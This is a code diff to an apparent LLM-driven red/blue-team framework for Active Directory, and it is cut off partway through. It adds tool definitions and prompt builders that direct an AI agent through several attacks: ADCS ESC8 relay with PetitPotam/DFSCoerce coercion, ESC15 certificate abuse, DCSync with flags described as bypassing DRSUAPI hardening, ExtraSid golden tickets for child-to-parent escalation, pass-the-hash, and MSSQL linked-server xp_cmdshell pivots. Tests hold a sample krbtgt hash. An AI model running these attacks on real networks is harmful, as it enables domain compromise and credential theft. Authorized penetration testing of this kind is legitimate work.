diff --git a/ares-llm/src/prompt/blue.rs b/ares-llm/src/prompt/blue.rs index 6d2b579c..5bf24702 100644 --- a/ares-llm/src/prompt/blue.rs +++ b/ares-llm/src/prompt/blue.rs @@ -349,6 +349,10 @@ mod tests {
     use super::*;
     use serde_json::json;
+    // -----------------------------------------------------------------------
+    // generate_blue_task_prompt
+    // -----------------------------------------------------------------------
+
     #[test]
     fn generate_blue_task_prompt_returns_none_for_unknown_type() {
         let params = json!({});
@@ -397,6 +401,10 @@ mod tests {
         assert!(generate_blue_task_prompt("host_investigation", "t-7", &params, "state").is_some());
     }
+    // -----------------------------------------------------------------------
+    // blue_role_template
+    // -----------------------------------------------------------------------
+
     #[test]
     fn role_template_triage() {
         assert_eq!(
@@ -445,6 +453,10 @@ mod tests {
         );
     }
+    // -----------------------------------------------------------------------
+    // build_blue_system_prompt
+    // -----------------------------------------------------------------------
+
     #[test]
     fn system_prompt_succeeds_for_triage() {
         let caps = vec!["query_loki".to_string(), "record_evidence".to_string()];
@@ -505,6 +517,10 @@ mod tests {
         assert!(!result.is_empty());
     }
+    // -----------------------------------------------------------------------
+    // build_initial_alert_prompt
+    // -----------------------------------------------------------------------
+
    #[test]
     fn initial_alert_prompt_extracts_alert_name_from_labels() {
         let alert = json!({
diff --git a/ares-llm/src/prompt/exploit/adcs.rs b/ares-llm/src/prompt/exploit/adcs.rs index 02b377dd..2c9b4ef5 100644 --- a/ares-llm/src/prompt/exploit/adcs.rs +++ b/ares-llm/src/prompt/exploit/adcs.rs @@ -42,7 +42,7 @@ pub(crate) fn generate_adcs_enumerate_prompt(
     render_template_with_context(TASK_EXPLOIT_ADCS_ENUMERATE, &ctx)
 }
-/// Generate prompt for ADCS ESC1/ESC4/ESC8 exploitation tasks.
+/// Generate prompt for ADCS ESC exploitation tasks.
 pub(crate) fn generate_adcs_esc_prompt(
     task_id: &str,
     payload: &Value,
@@ -51,22 +51,72 @@ pub(crate) fn generate_adcs_esc_prompt(
     domain: &str,
     vuln_type: &str,
 ) -> anyhow::Result<String> {
+    // CA server: try ca_server, ca_host, target_ip, then fall back to target
     let ca_server = payload
         .get("ca_server")
+        .or_else(|| payload.get("ca_host"))
+        .or_else(|| payload.get("target_ip"))
         .and_then(|v| v.as_str())
         .unwrap_or(target);
+    let ca_name = payload
+        .get("ca_name")
+        .and_then(|v| v.as_str())
+        .unwrap_or("");
     let template = payload
         .get("template")
         .and_then(|v| v.as_str())
         .unwrap_or("");
+    let username = payload
+        .get("username")
+        .and_then(|v| v.as_str())
+        .unwrap_or("");
+    let password = payload
+        .get("password")
+        .and_then(|v| v.as_str())
+        .unwrap_or("");
+    let dc_ip = payload.get("dc_ip").and_then(|v| v.as_str()).unwrap_or("");
+    let admin_sid = payload
+        .get("admin_sid")
+        .and_then(|v| v.as_str())
+        .unwrap_or("");
+    let instructions = payload
+        .get("instructions")
+        .and_then(|v| v.as_str())
+        .unwrap_or("");
+    let coerce_target = payload
+        .get("coerce_target")
+        .and_then(|v| v.as_str())
+        .unwrap_or("");
+    let coerce_targets: Vec<String> = payload
+        .get("coerce_targets")
+        .and_then(|v| v.as_array())
+        .map(|arr| {
+            arr.iter()
+                .filter_map(|v| v.as_str().map(String::from))
+                .collect()
+        })
+        .unwrap_or_default();
+    let listener_ip = payload
+        .get("listener_ip")
+        .and_then(|v| v.as_str())
+        .unwrap_or("");
     let vt_lower
= vuln_type.to_lowercase(); let mut ctx = Context::new(); ctx.insert("task_id", task_id); ctx.insert("ca_server", ca_server); + ctx.insert("ca_name", ca_name); ctx.insert("template", template); ctx.insert("domain", domain); + ctx.insert("username", username); + ctx.insert("password", password); + ctx.insert("dc_ip", dc_ip); + ctx.insert("admin_sid", admin_sid); + ctx.insert("instructions", instructions); + ctx.insert("coerce_target", coerce_target); + ctx.insert("coerce_targets", &coerce_targets); + ctx.insert("listener_ip", listener_ip); ctx.insert("vuln_upper", &vuln_type.to_uppercase()); ctx.insert("is_esc8", &vt_lower.contains("esc8")); insert_state_context(&mut ctx, state, "exploit", Some(target)); diff --git a/ares-llm/src/prompt/exploit/mod.rs b/ares-llm/src/prompt/exploit/mod.rs index bbc554d7..ab5de3df 100644 --- a/ares-llm/src/prompt/exploit/mod.rs +++ b/ares-llm/src/prompt/exploit/mod.rs @@ -87,9 +87,9 @@ pub(crate) fn generate_exploit_prompt( ); } - // ADCS ESC1 / ESC4 / ESC8 + // ADCS ESC exploitation (all ESC types) let vt_lower = vuln_type.to_lowercase(); - if vt_lower.contains("esc1") || vt_lower.contains("esc4") || vt_lower.contains("esc8") { + if vt_lower.contains("esc") { return adcs::generate_adcs_esc_prompt(task_id, payload, state, target, domain, vuln_type); } diff --git a/ares-llm/src/prompt/exploit/trust.rs b/ares-llm/src/prompt/exploit/trust.rs index 245f9ed9..a871ec3e 100644 --- a/ares-llm/src/prompt/exploit/trust.rs +++ b/ares-llm/src/prompt/exploit/trust.rs @@ -48,6 +48,12 @@ pub(crate) fn generate_trust_key_prompt( .get("trust_key") .and_then(|v| v.as_str()) .unwrap_or(""); + // Child krbtgt hash, when known, enables the ExtraSid-via-child-krbtgt + // path (preferred for child-to-parent — does NOT need a trust key). 
+ let child_krbtgt_hash_payload = payload + .get("child_krbtgt_hash") + .and_then(|v| v.as_str()) + .unwrap_or(""); // Look up password from state if not in payload let password = if password.is_empty() { @@ -106,6 +112,31 @@ pub(crate) fn generate_trust_key_prompt( .and_then(|v| v.as_str()) .unwrap_or(dc_ip); + // Resolve the target DC hostname from state hosts. + // Kerberos auth requires a hostname (not IP) matching the SPN in the ticket. + let target_dc_hostname = if let Some(s) = state { + // First try: find a host whose IP matches target_dc_hint + s.hosts + .iter() + .find(|h| h.ip == target_dc_hint && !h.hostname.is_empty()) + .map(|h| h.hostname.clone()) + // Fallback: any DC host in the trusted domain + .or_else(|| { + s.hosts + .iter() + .find(|h| { + h.is_dc + && h.hostname + .to_lowercase() + .ends_with(&format!(".{}", trusted_domain.to_lowercase())) + }) + .map(|h| h.hostname.clone()) + }) + .unwrap_or_default() + } else { + String::new() + }; + let trust_key_or_placeholder = if has_trust_key { trust_key } else { @@ -133,6 +164,28 @@ pub(crate) fn generate_trust_key_prompt( target_sid }; + // Look up child krbtgt hash from state if not already in payload. 
+ let child_krbtgt_hash: String = if !child_krbtgt_hash_payload.is_empty() { + child_krbtgt_hash_payload.to_string() + } else if is_child_to_parent { + if let Some(s) = state { + s.hashes + .iter() + .find(|h| { + h.username.eq_ignore_ascii_case("krbtgt") + && h.domain.eq_ignore_ascii_case(domain) + && h.hash_type.eq_ignore_ascii_case("NTLM") + }) + .map(|h| h.hash_value.clone()) + .unwrap_or_default() + } else { + String::new() + } + } else { + String::new() + }; + let has_child_krbtgt = !child_krbtgt_hash.is_empty(); + // Admin hash for hash-based raiseChild auth (used when password is empty) let admin_hash = payload .get("admin_hash") @@ -153,12 +206,15 @@ pub(crate) fn generate_trust_key_prompt( ctx.insert("is_child_to_parent", &is_child_to_parent); ctx.insert("trusted_domain_prefix", &trusted_domain_prefix); ctx.insert("target_dc_hint", target_dc_hint); + ctx.insert("target_dc_hostname", &target_dc_hostname); ctx.insert("trust_key_or_placeholder", trust_key_or_placeholder); ctx.insert("trust_key_val", trust_key_val); ctx.insert("source_sid_val", source_sid_val); ctx.insert("target_sid_val", target_sid_val); ctx.insert("extra_sid_val", extra_sid_val); ctx.insert("admin_hash", admin_hash); + ctx.insert("child_krbtgt_hash", &child_krbtgt_hash); + ctx.insert("has_child_krbtgt", &has_child_krbtgt); ctx.insert("step_extract", &step_extract); ctx.insert("step_sid", &step_sid); ctx.insert("step_forge", &step_forge); diff --git a/ares-llm/src/prompt/helpers.rs b/ares-llm/src/prompt/helpers.rs index 532df40f..2e9dcab1 100644 --- a/ares-llm/src/prompt/helpers.rs +++ b/ares-llm/src/prompt/helpers.rs @@ -30,6 +30,12 @@ pub(crate) fn insert_credential_context(ctx: &mut Context, payload: &Value) { ); } } + // Surface bind_domain so templates can instruct the LLM to use it + if let Some(bd) = payload.get("bind_domain").and_then(|v| v.as_str()) { + if !bd.is_empty() { + ctx.insert("bind_domain", bd); + } + } } /// Insert formatted state context into a Tera context. 
diff --git a/ares-llm/src/prompt/recon.rs b/ares-llm/src/prompt/recon.rs index 8c098d09..7ac881a7 100644 --- a/ares-llm/src/prompt/recon.rs +++ b/ares-llm/src/prompt/recon.rs @@ -34,6 +34,24 @@ pub(crate) fn generate_recon_prompt( ctx.insert("techniques", &techniques); } + // Single technique (e.g. certipy_find, ldap_group_enumeration) + if let Some(technique) = payload["technique"].as_str() { + ctx.insert("technique", technique); + } + + // Task-specific instructions (e.g. certipy commands, LDAP queries) + if let Some(instructions) = payload["instructions"].as_str() { + ctx.insert("instructions", instructions); + } + + // NTLM hash for pass-the-hash authentication + if let Some(ntlm_hash) = payload["ntlm_hash"].as_str() { + ctx.insert("ntlm_hash", ntlm_hash); + } + if let Some(hash_username) = payload["hash_username"].as_str() { + ctx.insert("hash_username", hash_username); + } + insert_state_context(&mut ctx, state, "recon", payload["target_ip"].as_str()); render_template_with_context(TASK_RECON, &ctx) diff --git a/ares-llm/src/prompt/tests.rs b/ares-llm/src/prompt/tests.rs index 793b101b..faa74cfa 100644 --- a/ares-llm/src/prompt/tests.rs +++ b/ares-llm/src/prompt/tests.rs @@ -511,6 +511,56 @@ fn exploit_adcs_esc8() { assert!(prompt.contains("ntlmrelayx")); assert!(prompt.contains("web enrollment")); assert!(!prompt.contains("certipy_request")); + // No coerce_target field provided -> no "Coerce Target:" header rendered + assert!(!prompt.contains("Coerce Target:")); +} + +#[test] +fn exploit_adcs_esc8_renders_coerce_target_when_present() { + let payload = serde_json::json!({ + "vuln_type": "adcs_esc8", + "target": "192.168.58.15", + "ca_server": "192.168.58.10", + "domain": "contoso.local", + "coerce_target": "192.168.58.20", + "listener_ip": "192.168.58.50", + }); + let prompt = generate_task_prompt("exploit", "t-26", &payload, None).unwrap(); + assert!(prompt.contains("Coerce Target (primary): 192.168.58.20")); + assert!(prompt.contains("Relay Listener: 
192.168.58.50")); + assert!(prompt.contains("Coerce 192.168.58.20")); +} + +#[test] +fn exploit_adcs_esc8_renders_fallback_targets() { + let payload = serde_json::json!({ + "vuln_type": "adcs_esc8", + "target": "192.168.58.15", + "ca_server": "192.168.58.10", + "domain": "contoso.local", + "coerce_target": "192.168.58.20", + "coerce_targets": ["192.168.58.20", "192.168.58.30", "192.168.58.51"], + "listener_ip": "192.168.58.50", + }); + let prompt = generate_task_prompt("exploit", "t-26b", &payload, None).unwrap(); + assert!(prompt.contains("Fallback Coerce Targets")); + assert!(prompt.contains("192.168.58.30")); + assert!(prompt.contains("192.168.58.51")); +} + +#[test] +fn exploit_adcs_esc8_omits_fallback_block_when_only_one_candidate() { + let payload = serde_json::json!({ + "vuln_type": "adcs_esc8", + "target": "192.168.58.15", + "ca_server": "192.168.58.10", + "domain": "contoso.local", + "coerce_target": "192.168.58.20", + "coerce_targets": ["192.168.58.20"], + "listener_ip": "192.168.58.50", + }); + let prompt = generate_task_prompt("exploit", "t-26c", &payload, None).unwrap(); + assert!(!prompt.contains("Fallback Coerce Targets")); } #[test] @@ -549,6 +599,42 @@ fn exploit_child_to_parent_has_raise_child() { assert!(prompt.contains("Enterprise Admins")); } +#[test] +fn exploit_child_to_parent_offers_extra_sid_via_child_krbtgt() { + let payload = serde_json::json!({ + "vuln_type": "child_to_parent", + "target": "192.168.58.10", + "domain": "child.contoso.local", + "trusted_domain": "contoso.local", + "username": "Administrator", + "password": "P@ss1", + "dc_ip": "192.168.58.10", + "source_sid": "S-1-5-21-1111-2222-3333", + "target_sid": "S-1-5-21-4444-5555-6666", + "child_krbtgt_hash": "8c6d94541dbc90f085e86828428d2cbf", + }); + let prompt = generate_task_prompt("exploit", "t-32", &payload, None).unwrap(); + // ExtraSid via child krbtgt — generate_golden_ticket with extra_sid pointing + // at the parent's Enterprise Admins SID (RID 519). 
+ assert!(prompt.contains("INTRA-FOREST CHILD→PARENT")); + assert!(prompt.contains("generate_golden_ticket")); + assert!(prompt.contains("8c6d94541dbc90f085e86828428d2cbf")); + assert!(prompt.contains("S-1-5-21-4444-5555-6666-519")); + // Followed by secretsdump_kerberos on the parent DC. + assert!(prompt.contains("secretsdump_kerberos")); + // The intra-forest path should NOT *invoke* extract_trust_key/get_sid/ + // create_inter_realm_ticket — those are unnecessary when the child krbtgt + // is in hand and previously caused the LLM to bail out on empty creds. + // We allow the names to appear in a "Do NOT call" instruction but never + // as actual function-call syntax. + assert!(!prompt.contains("extract_trust_key(")); + assert!(!prompt.contains("create_inter_realm_ticket(")); + assert!(prompt.contains("Do NOT call extract_trust_key")); + // Fallbacks for SPN target name validation / DRSUAPI hardening. + assert!(prompt.contains("just_dc_user='krbtgt'")); + assert!(prompt.contains("use_vss=true")); +} + #[test] fn exploit_mssql_lateral_enumeration() { let state = StateSnapshot { diff --git a/ares-llm/src/routing/credentials.rs b/ares-llm/src/routing/credentials.rs index ff72f614..c37cc46e 100644 --- a/ares-llm/src/routing/credentials.rs +++ b/ares-llm/src/routing/credentials.rs @@ -11,8 +11,9 @@ use super::domain::normalize_domain; /// Enforces AD trust-scope rules: /// - Same domain: always valid /// - Parent → child: parent-domain creds can authenticate to child domain LDAP -/// - Child → parent: blocked (child creds cannot auth to parent LDAP) -/// - Cross-forest: blocked for direct LDAP authentication +/// - Child → parent: valid (NTLM/Kerberos auth traverses parent-child trust) +/// - Cross-forest bidirectional: valid (NTLM auth traverses forest trust) +/// - Cross-forest one-way inbound only: blocked pub fn is_valid_credential_for_domain( cred_domain: &str, target_domain: &str, @@ -32,15 +33,24 @@ pub fn is_valid_credential_for_domain( return true; } - // 
Child → parent: blocked + // Child → parent: valid — NTLM/Kerberos authentication traverses the + // parent-child trust bidirectionally. The target DC forwards the auth + // request to the child domain DC via the trust's secure channel. // e.g. cred=north.contoso.local, target=contoso.local if cred_lower.ends_with(&format!(".{target_lower}")) { - return false; + return true; } - // Cross-forest: block if either side is a known trust - if trusted_domains.contains_key(&target_lower) || trusted_domains.contains_key(&cred_lower) { - return false; + // Cross-forest: allow when a trust's direction permits the authentication + if let Some(trust) = trusted_domains.get(&target_lower) { + if trust.direction == "bidirectional" || trust.direction == "outbound" { + return true; + } + } + if let Some(trust) = trusted_domains.get(&cred_lower) { + if trust.direction == "bidirectional" || trust.direction == "inbound" { + return true; + } } // Unknown relationship: block by default (cross-domain LDAP without trust info is risky) @@ -188,9 +198,9 @@ mod tests { } #[test] - fn child_to_parent_blocked() { + fn child_to_parent_valid() { let trusts = HashMap::new(); - assert!(!is_valid_credential_for_domain( + assert!(is_valid_credential_for_domain( "north.contoso.local", "contoso.local", &trusts @@ -198,7 +208,7 @@ mod tests { } #[test] - fn cross_forest_blocked() { + fn cross_forest_bidirectional_valid() { let mut trusts = HashMap::new(); trusts.insert( "fabrikam.local".to_string(), @@ -210,6 +220,17 @@ mod tests { sid_filtering: true, }, ); + assert!(is_valid_credential_for_domain( + "contoso.local", + "fabrikam.local", + &trusts + )); + } + + #[test] + fn cross_forest_no_trust_blocked() { + let trusts = HashMap::new(); + // No trust info at all → blocked assert!(!is_valid_credential_for_domain( "contoso.local", "fabrikam.local", @@ -228,11 +249,12 @@ mod tests { } #[test] - fn child_cred_blocked_for_parent_domain() { + fn child_cred_valid_for_parent_domain() { let trusts = HashMap::new(); let creds =
vec![make_cred("admin", "north.contoso.local", "P@ss1")]; let map = HashMap::new(); let found = find_domain_credential("contoso.local", &creds, &map, &trusts); - assert!(found.is_none()); + assert!(found.is_some()); + assert_eq!(found.unwrap().domain, "north.contoso.local"); } } diff --git a/ares-llm/src/tool_registry/blue/state.rs b/ares-llm/src/tool_registry/blue/state.rs index a92085c0..3ac83e4f 100644 --- a/ares-llm/src/tool_registry/blue/state.rs +++ b/ares-llm/src/tool_registry/blue/state.rs @@ -9,7 +9,7 @@ pub(super) fn investigation_state_tool_definitions() -> Vec { vec![ ToolDefinition { name: "add_evidence".into(), - description: "Add a single evidence item to the investigation. For multiple items, prefer add_evidence_batch to record them all in one call.".into(), + description: "Add a single evidence item to the investigation. The `value` MUST be an IOC that appeared in a recent Loki/Prometheus query result (or a MITRE technique ID like T1003.006) — values not seen in observed query data are rejected. For multiple items, prefer add_evidence_batch to record them all in one call.".into(), input_schema: json!({ "type": "object", "properties": { @@ -54,7 +54,7 @@ pub(super) fn investigation_state_tool_definitions() -> Vec { }, ToolDefinition { name: "add_evidence_batch".into(), - description: "Add multiple evidence items in a single call. Use this instead of calling add_evidence repeatedly — it records all items in one Redis pipeline round-trip and has its own separate call budget.".into(), + description: "Add multiple evidence items in a single call. Each item's `value` MUST be an IOC observed in a recent Loki/Prometheus query (or a MITRE technique ID) — items whose values were not seen in any recorded query result are rejected. 
Use this instead of calling add_evidence repeatedly — it records all items in one Redis pipeline round-trip and has its own separate call budget.".into(), input_schema: json!({ "type": "object", "properties": { diff --git a/ares-llm/src/tool_registry/coercion.rs b/ares-llm/src/tool_registry/coercion.rs index 9c295e1a..28836562 100644 --- a/ares-llm/src/tool_registry/coercion.rs +++ b/ares-llm/src/tool_registry/coercion.rs @@ -195,6 +195,49 @@ pub(super) fn tool_definitions() -> Vec { "required": ["target_ip"] }), }, + ToolDefinition { + name: "relay_and_coerce".into(), + description: "Run the full ADCS ESC8 relay+coerce attack as ONE deterministic call. Starts ntlmrelayx targeting the AD CS web enrollment endpoint, then coerces a remote machine to authenticate back: phase 1 attempts unauthenticated PetitPotam (works on unpatched DCs without any creds — preferred); phase 2 falls back to authenticated DFSCoerce (MS-DFSNM); phase 3 falls back to coercer over MS-EFSR → MS-RPRN if creds are supplied. CRITICAL: source ≠ target. coerce_target MUST be a different machine than ca_host — Windows NTLM same-machine loopback protection blocks relay when the coerced host is the relay target. Coerce a DC or other machine and relay it to the CA. The captured certificate is decoded from the relay log and a `certificate_obtained` vulnerability is emitted automatically — `auto_certipy_auth` will then PKINIT and extract the NT hash. Use this instead of orchestrating ntlmrelayx_to_adcs + petitpotam/coercer manually.".into(), + input_schema: json!({ + "type": "object", + "properties": { + "ca_host": { + "type": "string", + "description": "AD CS server IP/hostname running the Certificate Authority web enrollment service (HTTP /certsrv)" + }, + "coerce_target": { + "type": "string", + "description": "Machine to coerce (NOT ca_host — must be a different host). Its machine account is what the relay will impersonate. 
Typically a DC's IP/hostname; in cross-forest scenarios any reachable machine in the target's RPC scope works." + }, + "attacker_ip": { + "type": "string", + "description": "Local listener IP that the coerced machine will authenticate to" + }, + "coerce_user": { + "type": "string", + "description": "Optional username for authenticated coercer fallback (only needed if unauth PetitPotam is patched; cross-forest: child user with RPC access)" + }, + "coerce_password": { + "type": "string", + "description": "Password for coerce_user (provide either coerce_password OR coerce_hash; only required if coerce_user is set)" + }, + "coerce_hash": { + "type": "string", + "description": "NT hash for coerce_user (provide either coerce_password OR coerce_hash; only required if coerce_user is set)" + }, + "coerce_domain": { + "type": "string", + "description": "Domain for coerce_user (the user's home realm, may differ from coerce_target's realm; only required if coerce_user is set)" + }, + "template": { + "type": "string", + "description": "Certificate template to request (default: DomainController)", + "default": "DomainController" + } + }, + "required": ["ca_host", "coerce_target", "attacker_ip"] + }), + }, ToolDefinition { name: "ntlmrelayx_multirelay".into(), description: "Relay captured NTLM authentication to multiple SMB targets simultaneously. 
Attempts to dump SAM database hashes from each target where the relayed account has local administrator privileges.".into(), diff --git a/ares-llm/src/tool_registry/credential_access/netexec_tools.rs b/ares-llm/src/tool_registry/credential_access/netexec_tools.rs index 977f1de4..27cf749d 100644 --- a/ares-llm/src/tool_registry/credential_access/netexec_tools.rs +++ b/ares-llm/src/tool_registry/credential_access/netexec_tools.rs @@ -101,6 +101,32 @@ pub fn definitions() -> Vec { "required": ["target", "domain"] }), }, + ToolDefinition { + name: "smb_login_check".into(), + description: "Validate a single credential against a target via SMB. Use this to verify that a credential works before attempting more complex attacks.".into(), + input_schema: json!({ + "type": "object", + "properties": { + "target": { + "type": "string", + "description": "Target IP address or hostname" + }, + "username": { + "type": "string", + "description": "Username to authenticate with" + }, + "password": { + "type": "string", + "description": "Password to authenticate with" + }, + "domain": { + "type": "string", + "description": "Target domain name" + } + }, + "required": ["target", "username", "password", "domain"] + }), + }, ToolDefinition { name: "gpp_password_finder".into(), description: "Search Group Policy Preferences for credentials (cpassword). Finds GPP XML files in SYSVOL containing encrypted passwords that can be trivially decrypted.".into(), diff --git a/ares-llm/src/tool_registry/credential_access/secretsdump.rs b/ares-llm/src/tool_registry/credential_access/secretsdump.rs index b89b45e8..2e7d754f 100644 --- a/ares-llm/src/tool_registry/credential_access/secretsdump.rs +++ b/ares-llm/src/tool_registry/credential_access/secretsdump.rs @@ -43,6 +43,14 @@ pub fn definitions() -> Vec { "type": "string", "description": "Path to Kerberos ccache ticket file for authentication" }, + "just_dc_user": { + "type": "string", + "description": "Restrict DCSync to a single account (e.g. 
'krbtgt' or 'Administrator'). Bypasses 'SPN target name validation' / DRSUAPI hardening that blocks full dumps." + }, + "use_vss": { + "type": "boolean", + "description": "Use VSS shadow-copy extraction instead of DRSUAPI. Falls back when DRSUAPI is hardened." + }, "timeout_minutes": { "type": "integer", "description": "Overall operation timeout in minutes (default: 3)", diff --git a/ares-llm/src/tool_registry/lateral/execution.rs b/ares-llm/src/tool_registry/lateral/execution.rs index e8364d2c..56a94d47 100644 --- a/ares-llm/src/tool_registry/lateral/execution.rs +++ b/ares-llm/src/tool_registry/lateral/execution.rs @@ -416,6 +416,14 @@ pub fn definitions() -> Vec { "type": "string", "description": "Target IP address (if different from hostname resolution)" }, + "just_dc_user": { + "type": "string", + "description": "Restrict DCSync to a single account (e.g. 'krbtgt' or 'Administrator'). Bypasses 'SPN target name validation' / DRSUAPI hardening blocking full dumps." + }, + "use_vss": { + "type": "boolean", + "description": "Use VSS shadow-copy method instead of DRSUAPI replication. Falls back when DRSUAPI is restricted by domain hardening." + }, "timeout_minutes": { "type": "integer", "description": "Maximum time in minutes before aborting the dump", @@ -464,6 +472,14 @@ pub fn secretsdump_kerberos_definition() -> Vec { "type": "string", "description": "Target IP address (if different from hostname resolution)" }, + "just_dc_user": { + "type": "string", + "description": "Restrict DCSync to a single account (e.g. 'krbtgt' or 'Administrator'). Bypasses 'SPN target name validation' / DRSUAPI hardening blocking full dumps." + }, + "use_vss": { + "type": "boolean", + "description": "Use VSS shadow-copy method instead of DRSUAPI replication. Falls back when DRSUAPI is restricted by domain hardening." 
+ }, "timeout_minutes": { "type": "integer", "description": "Maximum time in minutes before aborting the dump", diff --git a/ares-llm/src/tool_registry/lateral/mssql.rs b/ares-llm/src/tool_registry/lateral/mssql.rs index 0b32a043..e9e3b94d 100644 --- a/ares-llm/src/tool_registry/lateral/mssql.rs +++ b/ares-llm/src/tool_registry/lateral/mssql.rs @@ -194,8 +194,12 @@ pub fn definitions() -> Vec { }, ToolDefinition { name: "mssql_exec_linked".into(), - description: "Execute SQL queries on a linked MSSQL server via OPENQUERY. \ - Enables lateral movement through SQL Server linked server chains." + description: "Execute SQL queries on a linked MSSQL server via `EXEC ('...') AT \ + [link]` (RPC OUT). The hop runs as the connecting user's mapped credential, \ + which fails on cross-forest links without Kerberos delegation. For cross-forest \ + pivots: pass `impersonate_user='sa'` to wrap the hop in EXECUTE AS LOGIN \ + (uses the local SeImpersonate path), or use `mssql_openquery` to ride the \ + linked server's stored login mapping." .into(), input_schema: json!({ "type": "object", @@ -228,6 +232,58 @@ pub fn definitions() -> Vec { "type": "boolean", "description": "Use Windows authentication instead of SQL auth", "default": true + }, + "impersonate_user": { + "type": "string", + "description": "Optional source-side login to impersonate before the hop (EXECUTE AS LOGIN). Use 'sa' to break out of double-hop limits when the local connection has IMPERSONATE on sa." + } + }, + "required": ["target", "username", "password", "linked_server", "query"] + }), + }, + ToolDefinition { + name: "mssql_openquery".into(), + description: "Query a linked MSSQL server via OPENQUERY using the linked server's \ + configured remote login (sp_addlinkedsrvlogin). 
Bypasses Kerberos double-hop \ + — use this when `mssql_exec_linked` fails on cross-forest links because the \ + connecting principal can't delegate, but the linked server has a stored \ + credential mapping (RPC OUT + sp_addlinkedsrvlogin)." + .into(), + input_schema: json!({ + "type": "object", + "properties": { + "target": { + "type": "string", + "description": "MSSQL server IP or hostname (entry point)" + }, + "username": { + "type": "string", + "description": "Username for authentication" + }, + "password": { + "type": "string", + "description": "Password for authentication" + }, + "linked_server": { + "type": "string", + "description": "Name of the linked server to query" + }, + "query": { + "type": "string", + "description": "SQL query string passed inside OPENQUERY (single quotes auto-escaped)" + }, + "domain": { + "type": "string", + "description": "Domain name for Windows authentication" + }, + "windows_auth": { + "type": "boolean", + "description": "Use Windows authentication instead of SQL auth", + "default": true + }, + "impersonate_user": { + "type": "string", + "description": "Optional source-side login to impersonate before OPENQUERY (e.g. 'sa') for IMPERSONATE-based escalation." } }, "required": ["target", "username", "password", "linked_server", "query"] @@ -236,7 +292,8 @@ pub fn definitions() -> Vec { ToolDefinition { name: "mssql_linked_enable_xpcmdshell".into(), description: "Enable xp_cmdshell on a linked MSSQL server. Required before \ - executing OS commands on the linked server." + executing OS commands on the linked server. Pass `impersonate_user='sa'` \ + for cross-forest hops where the connecting principal lacks delegation." 
.into(), input_schema: json!({ "type": "object", @@ -265,6 +322,10 @@ pub fn definitions() -> Vec { "type": "boolean", "description": "Use Windows authentication instead of SQL auth", "default": true + }, + "impersonate_user": { + "type": "string", + "description": "Optional source-side login to impersonate (EXECUTE AS LOGIN) before the hop." } }, "required": ["target", "username", "password", "linked_server"] @@ -273,7 +334,9 @@ pub fn definitions() -> Vec { ToolDefinition { name: "mssql_linked_xpcmdshell".into(), description: "Execute an OS command via xp_cmdshell on a linked MSSQL server. \ - Requires xp_cmdshell to be enabled on the linked server first." + Requires xp_cmdshell to be enabled on the linked server first. Pass \ + `impersonate_user='sa'` for cross-forest hops where the connecting \ + principal can't double-hop." .into(), input_schema: json!({ "type": "object", @@ -306,6 +369,10 @@ pub fn definitions() -> Vec { "type": "boolean", "description": "Use Windows authentication instead of SQL auth", "default": true + }, + "impersonate_user": { + "type": "string", + "description": "Optional source-side login to impersonate (EXECUTE AS LOGIN) before the hop." 
} }, "required": ["target", "username", "password", "linked_server", "command"] diff --git a/ares-llm/src/tool_registry/mod.rs b/ares-llm/src/tool_registry/mod.rs index b2fa2573..fbcb3b08 100644 --- a/ares-llm/src/tool_registry/mod.rs +++ b/ares-llm/src/tool_registry/mod.rs @@ -560,6 +560,10 @@ mod tests { } } + // ----------------------------------------------------------------------- + // Blue team tool registry tests + // ----------------------------------------------------------------------- + #[cfg(feature = "blue")] mod blue_tests { use crate::tool_registry::blue::{ diff --git a/ares-llm/src/tool_registry/privesc/adcs.rs b/ares-llm/src/tool_registry/privesc/adcs.rs index 3f09edc1..f1476efd 100644 --- a/ares-llm/src/tool_registry/privesc/adcs.rs +++ b/ares-llm/src/tool_registry/privesc/adcs.rs @@ -10,7 +10,7 @@ pub fn definitions() -> Vec { name: "certipy_find".into(), description: "Find vulnerable certificate templates in Active Directory Certificate \ Services (AD CS). Enumerates CAs, templates, and identifies exploitable \ - misconfigurations (ESC1-ESC8)." + misconfigurations (ESC1-ESC15)." .into(), input_schema: json!({ "type": "object", @@ -31,13 +31,17 @@ pub fn definitions() -> Vec { "type": "string", "description": "Domain controller IP address" }, + "hashes": { + "type": "string", + "description": "NTLM hash for pass-the-hash (format: 'lmhash:nthash' or just ':nthash'). Use instead of password." + }, "vulnerable": { "type": "boolean", "description": "Only show vulnerable templates. Defaults to true.", "default": true } }, - "required": ["domain", "username", "password", "dc_ip"] + "required": ["domain", "username", "dc_ip"] }), }, ToolDefinition { @@ -77,6 +81,22 @@ pub fn definitions() -> Vec { "type": "string", "description": "User Principal Name to request the certificate for. 
Defaults to Administrator.", "default": "Administrator" + }, + "target": { + "type": "string", + "description": "CA server IP or hostname to connect to for certificate enrollment. REQUIRED when the CA is on a different host than the DC (e.g. CA on a member server, DC on the domain controller). Without this, certipy tries RPC on the DC which fails with ept_s_not_registered." + }, + "sid": { + "type": "string", + "description": "Object SID to embed in the certificate (e.g. 'S-1-5-21-...-500' for Administrator). Required by certipy v5+ to prevent SID mismatch errors during certipy_auth. For Administrator, use the domain SID + '-500'." + }, + "out": { + "type": "string", + "description": "Output filename for the PFX certificate (without .pfx extension). A unique name is auto-generated if not specified. The resulting file will be .pfx — use this path for certipy_auth's pfx_path parameter." + }, + "application_policies": { + "type": "string", + "description": "Application policy OID to include in the certificate request. Used for ESC15 (CVE-2024-49019) exploitation where the template uses application policy OIDs for authorization." } }, "required": ["domain", "username", "password", "dc_ip", "ca", "template"] @@ -210,10 +230,207 @@ pub fn definitions() -> Vec { "type": "string", "description": "UPN of the target user to impersonate. Defaults to Administrator.", "default": "Administrator" + }, + "target": { + "type": "string", + "description": "CA server IP or hostname for certificate enrollment. REQUIRED when the CA is on a different host than the DC." } }, "required": ["domain", "username", "password", "dc_ip", "template", "ca"] }), }, + ToolDefinition { + name: "certipy_ca".into(), + description: + "Manage a Certificate Authority using Certipy. 
